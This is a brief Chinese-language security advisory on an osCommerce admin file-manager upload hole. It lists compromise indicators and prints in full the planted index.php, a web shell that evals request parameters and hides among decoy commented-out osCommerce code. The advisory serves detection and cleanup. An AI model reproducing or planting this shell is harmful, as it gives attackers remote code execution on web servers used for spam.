最近发现osCommerce的后台管理程序file_manager.php可能存在漏洞,会被黑客恶意上传文件到服务器上,请用户在进行文件管理时尽可能使用FTP软件,并对/catalog/admin/file_manager.php进行删除处理。
该漏洞引起的问题如要特征如下:
1)服务器上被载入额外的php文件,例如:
/catalog/images/btaxf/index.php
其中btaxf文件夹名字是随机组合,有的受攻击者机器上的目录名为yahoo
2)该index.php文件的权限是nobody,例如:
-rwxrwxrwx 1 nobody nobody 1181 Apr 12 07:46 index.php*
3)主机会被用来群发垃圾邮件,黑客通过POST方式访问:
“POST /catalog/images/btaxf/index.php HTTP/1.1″ 200 2 “-” “PycURL/7.18.2″
4)该恶意增加index.php文件的代码如下:
/*
$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2003 osCommerce
Released under the GNU General Public License
*/
// require('includes/application_top.php');
// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_addre
ss) . "' and customers_id != '" . (int)$customer_id . "'");
// $check_email = tep_db_fetch_array($check_email_query);
// if ($check_email["total"] > 0) {
// $error = true;
error_reporting(0);
// if (!tep_session_is_registered(‘customer_id’)) {
eval(stripslashes($_REQUEST['osc']));
// if (ACCOUNT_GENDER == ‘true’) {
// if ( ($gender != ‘m’) && ($gender != ‘f’) ) {
// $error = true;
eval(base64_decode($_REQUEST['osc64']));
// $messageStack->add(‘account_edit’, ENTRY_GENDER_ERROR);
// }
// }
// $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo “Open Source E-Commerce Solutions “, 2000+10, ” year”;
// tep_redirect(tep_href_link(FILENAME_LOGIN, ”, ‘SSL’));
// }
?>
由于涉及的osCommerce版本较多,官方未提供解决办法,请用户发现该index.php文件后必须删除。
